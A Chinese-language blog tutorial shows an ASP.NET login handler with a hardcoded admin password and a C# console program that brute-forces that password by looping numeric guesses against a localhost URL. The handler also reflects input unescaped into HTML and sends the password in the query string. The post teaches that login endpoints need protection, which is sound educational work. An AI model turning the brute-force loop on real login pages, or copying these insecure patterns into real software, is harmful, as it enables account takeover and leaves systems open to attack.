ASP.NET基础学习,暴力破解密码
首先写出一段登陆程序:
//ashx端
<%@ WebHandler Language="C#" Class="AddCalation" %>
using System;
using System.Web;
public class AddCalation : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/html";
string ispostback=context.Request["isback"];
string username = context.Request["username"];
string password = context.Request["password"];
if (ispostback == "yes")
{
if (username == "admin" && password == "2314")
{
context.Response.Write("登陆成功");
}
else
{
context.Response.Write("登陆失败");
}
}
else
{
username = string.Empty;
password = string.Empty;
}
string path = context.Server.MapPath("AddCalation.html");
string content = System.IO.File.ReadAllText(path);
content=content.Replace("@user",username);
content = content.Replace("@pass", password);
context.Response.Write(content);
}
public bool IsReusable {
get {
return false;
}
}
}
//html端
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>加法计算器</title>
</head>
<body>
<form action="AddCalation.ashx">
<input type="hidden"value="yes"name="isback" />
<label for="user">用户名</label>
<input type="text" value="@user"name="username" />
<br />
<label for="pass">密码</label>
<input type="password" value="@pass" name="password" />
<br /><input type="submit" value="登陆" />
</form>
</body>
</html>
然后写一段C#控制台程序进行暴力破解
1 using System;
2 using System.Collections.Generic;
3 using System.Linq;
4 using System.Net;
5 using System.Text;
6 using System.Threading.Tasks;
7
8
9 namespace PasswordBreak
10 {
11 class Program
12 {
13 static void Main(string[] args)
14 {
15 WebClient wc = new WebClient();
16 wc.Encoding = Encoding.UTF8;
17 string s="";
18 for (int i = 0; i < 5000; i++)
19 {
20 s = wc.DownloadString("http://localhost:41566/AddCalation.ashx?isback=yes&username=admin&password=" + i);
21 if (s.Contains("登陆成功"))
22 { Console.WriteLine(i); break; }
23 }
24 Console.WriteLine();
25 Console.Write(s);
26 Console.ReadKey();
27 }
28 }
29 }通过循环依次试验密码来破解自己写的登陆代码中的密码
所以说登陆端口的安全性非常重要。
- 上一篇 »[转]PHP部分常见算法
- 下一篇 »1.两数之和,Python
